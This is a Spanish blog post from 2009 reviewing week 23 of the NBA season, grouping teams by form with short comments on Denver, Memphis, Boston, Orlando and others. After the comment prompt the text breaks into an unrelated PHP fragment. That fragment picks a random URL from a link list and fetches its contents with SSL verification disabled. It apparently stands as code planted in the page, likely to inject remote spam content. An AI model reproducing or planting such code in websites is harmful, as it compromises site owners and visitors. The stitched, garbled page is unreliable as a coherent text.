Informe Semanal (Semana 23)

06 de April de 2009 por txusma

Esto se acaba, amigos. Penúltimo Informe Semanal de la temporada que viene cargadito de sorpresas, con 2 equipos capaces de ganar sus 4 partidos de la semana, con teóricos favoritos que han levantado el pedal del acelerador y con esfuerzos de última hora que ya no sirven sinó para maquillar una pésima temporada.

ON FIRE

Sin duda el equipo más en forma en este momento parece ser Denver Nuggets. Han ganado sus 4 partidos de la semana y ya se han colocado segundos del Oeste con una ventaja de 2 victorias sobre el tercero, los San Antonio Spurs. Sorprendente los 4 partidos ganados por Memphis Grizzlies, entre ellos alguno importante, como el del viernes frente a los Mavs. Mayo vuelve a ser el de principios de temporada, Gay parece haber encontrado su sitio, Marc mantiene su regularidad y hasta Conley parece desperezarse. Tarde, pero de cara al año que viene no deja de ser una buena noticia para ellos.

El otro equipo que no ha perdido ningún partido esta semana han sido los Celtics aunque solo han jugado 2 partidos. Sin Garnett y con Orlando pisándoles los talones, estas 2 victorias no dejan de ser fundamentales.

A BUEN RITMO

Orlando Magic está media victoria por detrás de los verdes y con su apabullante victoria frente a Cleveland el viernes, demuestrán que son algo más que las comparsas de Cavs y Celtics en su lucha por el título de la conferencia Este. Su única derrota, frente los Raptors de Calderón, que cierran una buena semana con 2 victorias y una sola derrota (igual que los Pacers). Tarde, pero parece que empiezan a cogerle el tranquillo a esto de ganar. En el Este, la velocidad de crucero que habían imprimido los Sixers, tan solo pudo cortarla ayer New Jersey Nets. Con este arreón final Philadelphia se ha colocado a media victoria de Miami y la diferencia entre terminar sexto o quinto es enfrentarse en primera ronda a Orlando/Boston en un caso y Atlanta en el otro. Crucial batalla.

En el Oeste, mantienen el tipo Lakers, que perdió tan solo con una de sus bestias negras de los últimos tiempos, Charlotte; Dallas Mavericks, que viendo que los Phoenix Suns tampoco ceden y luchan hasta el último momento, no pueden permitirse ningún tipo de relajación; Portland Trailblazers, que se acerca a la ventaja de campo en primera ronda; y Golden State Warriors, que ya avisamos que con Monta Ellis, podían acabar en buena forma la temporada y convertirse en jueces de cualquiera de las múltiples luchas que se llevan a cabo en estos momentos.

AL TRAN-TRAN

Unos que parece que mirán más al futuro que al presente (Cavaliers, Hornets) y empiezan a guardar algo de fuerzas, otros que no dan más de sí aun inmersos todavía en importantes partidos (Hets, Bulls) y algún que otro esfuerzo en vano como el de los Nets. Pasito a pasito y sin cansarse llegan a final de liga.

AL BORDE DEL ABISMO

Estos últimos partidos son en los que los equipos deberían apretar los dientes y sacar todo lo que llevan dentro para intentar cumplir esos objetivos que se marcaron a principios de temporada, pero parece que tanto Bobcats como Pistons han iniciado una carrera lenta por dirimir el último equipo que se clasificará para los Playoffs del Este. Suerte para los Pistons que ganaron el duelo directo que les enfrentó anoche sinó, seguro que se estarían haciendo caquita…

En el Oeste, más derrotas que victorias de los Jazz, los Rockets y los Spurs. Imposible saber a que juegan. ¿Velan armas? ¿Se les acabó la gasolina?

Knicks, Bucks, Wolves, Wizards y Thunder se van a casa con una sola victoria semanal. Pero qué victoria la de los chicos de Arenas.

EL POZO

Para Sacramento Kings, Los Angeles Clippers y… Atlanta Hawks. 3 derrotas que han oscurecido el cielo de la ciudad de la Coca-Cola. Lo que podía haber sido una final plácido de liga regular se convierte en una lucha por defender la 4ª plaza. Hasta que no suena la campana aquí nadie regala nada.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>